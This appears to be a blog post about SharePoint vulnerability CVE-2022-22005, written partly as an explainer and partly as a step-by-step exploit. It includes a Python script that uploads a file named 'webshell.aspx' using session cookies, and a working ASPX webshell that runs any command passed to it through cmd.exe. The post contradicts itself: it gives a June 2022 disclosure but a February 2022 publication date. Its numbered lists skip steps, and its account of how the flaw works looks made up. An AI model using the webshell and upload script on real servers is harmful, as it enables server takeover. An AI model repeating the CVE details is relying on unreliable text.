CVE-2022-22005 - Diving into Microsoft SharePoint Server Remote Code Execution Vulnerability

Microsoft SharePoint is used by thousands of organizations for team collaboration, file management, and workflow automation. In June 2022, a critical vulnerability was disclosed: CVE-2022-22005 — a Remote Code Execution (RCE) flaw affecting SharePoint Server. It sent shockwaves through the cybersecurity community. Let's break down what it is, how it works, and why you need to patch your systems—complete with code snippets and references so you can understand and test (ethically) yourself.

What is CVE-2022-22005?

CVE-2022-22005 is a vulnerability in Microsoft SharePoint Server that can let an authenticated attacker execute any code they choose on the SharePoint server. This means an attacker can take control of the affected server, install programs, view, change, or delete data, or even create new admin accounts.

Microsoft assigned the following advisories

- Microsoft Security Guide – CVE-2022-22005
- NVD CVE-2022-22005 Details

How Does the Exploit Work?

The vulnerability exists due to improper validation of user input in SharePoint's handling of user-uploaded data (think files or specific payloads crafted by attackers). If an attacker can authenticate as any user (even a low privilege one) and upload a malicious payload, SharePoint can end up executing code on the host system.

Attacker uploads a specially crafted file (or makes a request with a payload).

3. The server processes the payload and, due to insufficient validation, executes arbitrary code on the backend.

Why is this dangerous?  
Because it doesn't require admin rights. Any authenticated user can exploit it, making any SharePoint portal with multiple users a potential target.

Example Exploit (Code Snippet)

> WARNING: This is for educational purposes only and should never be used on networks you do not own or have written permission to test. Running exploits illegally is a crime.

A proof of concept (“PoC”) for this bug often involves crafting an HTTP POST request to a vulnerable endpoint. One popular method is leveraging the /Documents/Forms/Upload.aspx page.

Here's a simple *Python 3* code snippet using requests that outlines the upload logic

import requests

# Your SharePoint URL and valid session cookie here!
sharepoint_url = "https://vulnerable-sharepoint-server/sites/demo/Documents/Forms/Upload.aspx";
session_cookies = {
    "FedAuth": "your_valid_fedauth_cookie",
    "rtFa": "your_valid_rtFa_cookie"
}

files = {
    'ctl00$PlaceHolderMain$ctl01$InputFile': ('webshell.aspx', open('webshell.aspx', 'rb'), 'application/octet-stream')
}
data = {
    '__EVENTTARGET': '',
    '__EVENTARGUMENT': '',
    '__VIEWSTATE': 'your_viewstate_here',  # Must capture from form if needed
    # ... more form data as required
}

resp = requests.post(sharepoint_url, cookies=session_cookies, files=files, data=data, verify=False)
print("[*] File upload response:", resp.status_code)

You must be logged in (FedAuth and rtFa cookies).

- You might need to scrape and submit extra hidden form values (like __VIEWSTATE, __EVENTVALIDATION).
- After upload, call the file in the uploaded location (e.g., /sites/demo/Documents/webshell.aspx) and interact with your webshell.

Example Webshell (very simple)

<%@ Page Language="C#" %>
<%
    if (Request["cmd"] != null) {
        System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]);
    }
%>

*Never deploy a real webshell. This example demonstrates why you must update & monitor your SharePoint servers!*

What You Should Do

1. Patch Immediately: Microsoft has released patches for all supported SharePoint versions. Install them ASAP!
  - June 2022 Patch Tuesday Details

2. Monitor Users and Uploads: Audit logs for unexpected uploads or logins, especially by low-privilege users.

Harden Authentication: Enforce Multi-Factor Authentication, restrict outdated protocols.

5. Limit Outbound Connections: Prevent shell “callbacks” by restricting the SharePoint server’s ability to reach out to the internet.

References and Further Reading

- Microsoft Security Update Guide – CVE-2022-22005
- NIST National Vulnerability Database - CVE-2022-22005
- Original MSRC Advisory
- SharePoint Security Best Practices

Conclusion

CVE-2022-22005 is a classic wake-up call: even authenticated users can wreak havoc if a system isn’t patched. If you use SharePoint, take this seriously. Staying a step ahead of attackers means immediate patching, strict monitoring, and understanding what’s under the hood of your critical business software.

Feel free to share this knowledge responsibly—your SharePoint might be your team’s backbone, but a single page upload could turn it into a hacker’s paradise if you’re not proactive.

Timeline

Published on: 02/09/2022 17:15:00 UTC
Last modified on: 03/04/2022 16:54:00 UTC